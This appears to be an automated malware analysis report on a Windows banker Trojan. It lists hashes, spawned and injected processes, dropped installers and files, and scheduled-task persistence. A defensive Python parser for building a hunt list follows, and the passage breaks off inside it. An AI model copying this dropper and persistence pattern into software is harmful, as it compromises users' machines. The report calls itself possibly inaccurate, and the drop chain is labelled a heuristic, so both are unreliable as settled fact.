Trojan.Generic.12152654_41115417ce

by malwarelabrobot on December 21st, 2014 in Malware Descriptions.

Trojan.Win32.Badur.kict (Kaspersky), Trojan.Generic.12152654 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.IEDummy.FD, mzpefinder_pcap_file.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan


This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.

MD5: 41115417ce44a83fc6e4343f11f8e63d
SHA1: 53068ee320b3e8bec8c55544c8f2dda38cd1ee96
SHA256: 862fda1c753b2ec5f7c6fbf7545a6604a464bdac84f1d475c9bf3d865c6e63ff
SSDeep: 12288:7HRbnuGLydXXv42SGQ1O53mLjGsY4seAgZrnej6JKcXnf:7HRbGL2v42TQomC4saZDeGJJf
Size: 712704 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-10-24 16:47:16
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan: a program that appears to do one thing but actually does another (a Trojan horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

yx_dts.exe:1476
%original file name%.exe:1452
notify.exe:2104
9158chat2_ktv083_98.exe:516
assistupdate.exe:2080
dts.exe:1728
dts.exe:1772
OfficeAssist.0419.80.1123.exe:744
OfficeAssist.0419.80.1123.exe:1752
regsvr32.exe:2136
regsvr32.exe:2716
regsvr32.exe:1280
regsvr32.exe:2280
regsvr32.exe:1124
regsvr32.exe:2940
9158.exe:2088

The Trojan injects its code into the following process(es):

MM-liao8398.exe:824
dts.exe:1940
1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process yx_dts.exe:1476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\大天使之剑.lnk (944 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe (29256 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\大天使之剑.lnk (922 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw43.tmp (44165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\大天使之剑\卸载大天使之剑.lnk (975 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\大天使之剑\大天使之剑.lnk (956 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (430 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\uninst.exe (11048 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\FindProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (0 bytes)

The process MM-liao8398.exe:824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CABBAJEH.htm (765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\icons[1].gif (7 bytes)
C:\temp.icon (1444 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv083_98.exe.tmp (149051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xui[1].js (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418\index.dat (0 bytes)

The process %original file name%.exe:1452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1419052427l238l63518[1].exe (49889 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
C:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027 (108 bytes)

The process notify.exe:2104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_png24.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\util\json3.js (8 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\flowcontrol.zip.dt! (148 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\topad.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\utils.zip.dt! (20716 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\log\notify_2014_12_20.log (6560 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\flowcontrol\flowcontrol.htm (12 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\skin_top.png (6 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\jQuery.js (2392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_con.png (7 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\meihua_mini.zip.dt! (92840 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading24.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\bg.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\main.css (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\warning.png (1 bytes)
%WinDir%\Tasks\PPTAssistantNotifyTask_adm.job (392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Utils.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading48.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading16.gif (455 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\adbgimg.png (2392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\hostapi.js (14 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\load.js (8184 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\index.html (7 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading.gif (5 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Urchin.js (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\moment.js (784 bytes)

The process 9158chat2_ktv083_98.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsc48.tmp (1080968 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158多人视频\卸载 9158多人视频.lnk (505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158多人视频\9158多人视频.lnk (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Desktop\9158多人视频.lnk (575 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\System.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step3.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\finish.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\custom.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\SkinBtn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\return.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading2.bmp (0 bytes)

The process assistupdate.exe:2080 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\PPTAssistantUpdateTask_adm.job (404 bytes)

The process dts.exe:1940 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\reg2[1].jpg (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[2].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[1].js (2672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[1].js (392 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (1234 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\getcard[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[2].js (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\04190114Mvpaw[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].css (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[1].css (4432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\log[1].jpg (6220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\19204027FVrEy[1].jpg (5194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[2].js (3759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\rem_on[1].jpg (807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\wl[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[2].js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1610242766g2O[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\101215116dbQk[1].jpg (2287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[1].jpg (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app[1].ini (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\1610242766g2O[1].jpg (2625 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[1].js (680 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[2].css (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[2].jpg (1883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wl[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\client[1].htm (2395 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].jpg (11642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].js (4865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\dot[1].jpg (463 bytes)
%Documents and Settings%\%current user%\Application Data\dts\Upgrade\app.ini (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\18162330BzQOu[1].jpg (2097 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\istat.controller[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.clientclass[1].js (1529 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app[1].ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1610242766g2O[1].jpg (0 bytes)

The process dts.exe:1728 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (72 bytes)

The process dts.exe:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (164 bytes)

The process 1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\MM-liao9906[1].exe (59304 bytes)
%Program Files%\MM-liao8398.exe (59304 bytes)
%Program Files%\2.ico (47632 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\OfficeAssist.0419.80.1123[1].exe (225788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\yx_dts[1].exe (58296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\nsProcess.dll (4 bytes)
%Program Files%\onlines_30863.exe (195990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Program Files%\1.rar (26 bytes)
%Program Files%\yx_dts.exe (58296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\onlines_30863[1].exe (195990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\NSISdl.dll (14 bytes)
%Program Files%\OfficeAssist.0419.80.1123.exe (225788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].ico (47632 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsg3F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp (0 bytes)

The process OfficeAssist.0419.80.1123.exe:744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist.dll (8215 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihuappt.pps (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistdownloader.exe (1209 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\product.xml (334 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\103.png (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\updateself.exe (933 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\30.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\20.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2007.ppsx (300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\desktoptip.exe (4220 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistdownloader.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\101.png (951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_bg.png (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\setup.cfg (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\notify.exe (2321 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\卸载.lnk (994 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\PPT美化大师.lnk (910 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist64.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\10.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua.exe (1885 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2007.ppsx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist64.dll (8201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\setup.cfg (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistupdate.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\104.png (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2010.ppsx (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\desktoptip.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility\uninst.exe (5466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2010.ppsx (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_fg.png (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\setup.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2003.pps (1810 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihuappt.pps (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\notify.exe (5896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\102.png (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\2.jpg (95 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\100.png (238 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2013.ppsx (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\updateself.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2003.pps (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistupdate.exe (4866 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2013.ppsx (199 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistdownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\product.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\updateself.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2007.ppsx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\desktoptip.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\setup.cfg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\feature.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2010.ppsx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistupdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2013.ppsx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2003.pps (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihuappt.pps (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\notify.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_fg.png (0 bytes)

The process OfficeAssist.0419.80.1123.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\FindProcDLL.dll (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\v6svc_oem.dll (5135 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\oem.ini (1263 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\OfficeAssist.0419.80.1123.exe (128768 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\OfficeAssist.0419.80.1123.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\oem.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx45.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\v6svc_oem.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\FindProcDLL.dll (0 bytes)
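The process list in this report is flat and the file lists above are long, written in Windows XP profile paths, and show the Chinese product names as GBK bytes viewed through a Latin-1 lens (`´óÌìʹ֮½£` is 大天使之剑, `9158¶àÈËÊÓÆµ` is 9158多人视频, `Ð¶ÔØ` is 卸载, "uninstall"). The following added example, the editor's code and not Lavasoft's, turns those two sections into something actionable: it parses lines in the format printed above, undoes the mojibake, rewrites the XP paths to the environment variables that resolve to the same folders on current Windows, produces a hunt list of paths that were written and not deleted again, and reconstructs a drop chain by assuming that the process which wrote `<name>.exe` is the one that launched `<name>.exe`. The sample text is a constructed subset of the lists above; the path mapping and the drop-chain inference are this example's own heuristics, not something the report states.

```python
import re

# The bytes B4 F3 CC EC CA B9 D6 AE BD A3 (GBK for the product name 大天使之剑)
# as the page renders them: the two byte pairs that happen to be valid UTF-8
# became one character each (U+02B9, U+05AE); every other byte fell back to Latin-1.
GAME_MOJIBAKE = "\u00b4\u00f3\u00cc\u00ec\u02b9\u05ae\u00bd\u00a3"

# Constructed subset of the file-activity lists above. {GAME} is spliced in
# from the code points so the example does not depend on this page's encoding.
SAMPLE_REPORT = r"""
The process %original file name%.exe:1452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027 (108 bytes)
The process 1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\yx_dts.exe (58296 bytes)
%Program Files%\OfficeAssist.0419.80.1123.exe (225788 bytes)
The process yx_dts.exe:1476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\{GAME}.lnk (944 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe (29256 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (0 bytes)
The process OfficeAssist.0419.80.1123.exe:744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\notify.exe (2321 bytes)
The process notify.exe:2104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\PPTAssistantNotifyTask_adm.job (392 bytes)
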